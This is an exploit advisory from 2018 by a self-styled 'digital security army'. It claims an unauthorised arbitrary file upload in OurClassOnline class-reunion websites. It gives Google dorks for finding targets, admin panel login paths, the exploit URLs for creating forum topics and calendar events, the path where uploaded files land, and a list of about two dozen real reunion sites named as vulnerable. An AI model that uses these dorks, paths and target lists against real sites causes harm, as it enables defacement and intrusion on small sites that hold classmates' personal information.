facebook facebook twitter rss

Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability

Author: KingSkrupellos , Published: 16-11-2018
# Exploit Title : Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 13/11/2018
# Vendor Homepage : webportalpeople.com ~ ourclassonline.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''To obtain a site like this for your class visit www.ourclassonline.com.''
intext:''Copyright Web Portal People, LLC. 2018 - Maker of class reunion & family websites. All rights reserved.''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Admin and Moderator Panel Login Paths :

/admin/index.php
/login_form.php?action=reunion
/login_form.php?action=news
/login_form.php?action=classmates
/login_form.php?action=gallery&galleryid=6
/login_form.php?action=gallery&galleryid=2
/login_form.php?action=gallery&galleryid=3
/login_form.php?action=year_review
/login_form.php?action=gallery&galleryid=4

#################################################################################################

# Exploit :

/forum_topic_create.php?forumid=1

/files_forum/[RANDOM-NUMBER]_[YOUR-FİLENAME-HERE].txt

/calendar_add.php

/calendar_event.php?eventid=[RANDOM-NUMBER]

#################################################################################################

# Example Vulnerable Sites =>

[+] mcclintockhighchargers1968.com/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/YZhat

[+] tech1958.net/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/euIxf

[+] tempehighbuffs68.com/forum_topic_create.php?forumid=1

[+] orhs66.com/forum_topic_create.php?forumid=1

[+] denfeld59.com/forum_topic_create.php?forumid=1

[+] edison68.com/forum_topic_create.php?forumid=1

[+] edison64.com/forum_topic_create.php?forumid=1

[+] edison65.com/forum_topic_create.php?forumid=1

[+] marshalltown68.com/forum_topic_create.php?forumid=1

[+] ths1958.com/forum_topic_create.php?forumid=1

[+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1

[+] hths74.com/forum_topic_create.php?forumid=1

[+] salemhighschool1959.com/forum_topic_create.php?forumid=1

[+] lchs1966bulldogs.com/forum_topic_create.php?forumid=1

[+] hooverhighclassof63.com/forum_topic_create.php?forumid=1

[+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1

[+] phs1957.com/forum_topic_create.php?forumid=1

[+] redlandshigh65.com/forum_topic_create.php?forumid=1

[+] warrenmott1983.com/forum_topic_create.php?forumid=1

[+] dulutheast1965.com/forum_topic_create.php?forumid=1

[+] axemen68.org/forum_topic_create.php?forumid=1

[+] olympushigh1967.com/forum_topic_create.php?forumid=1

[+] leuzingerhigh1981.com/forum_topic_create.php?forumid=1

[+] bozemanhawks88.com/forum_topic_create.php?forumid=1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :